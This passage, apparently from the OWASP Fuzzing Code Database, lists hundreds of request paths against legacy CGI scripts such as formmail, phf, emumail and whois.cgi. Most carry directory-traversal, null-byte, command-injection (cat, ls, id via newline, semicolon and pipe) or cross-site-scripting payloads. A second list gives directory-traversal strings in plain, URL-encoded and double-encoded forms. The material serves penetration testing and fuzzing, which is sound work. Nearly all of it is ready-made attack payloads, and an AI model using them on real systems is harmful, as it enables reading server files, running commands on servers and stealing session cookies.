emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
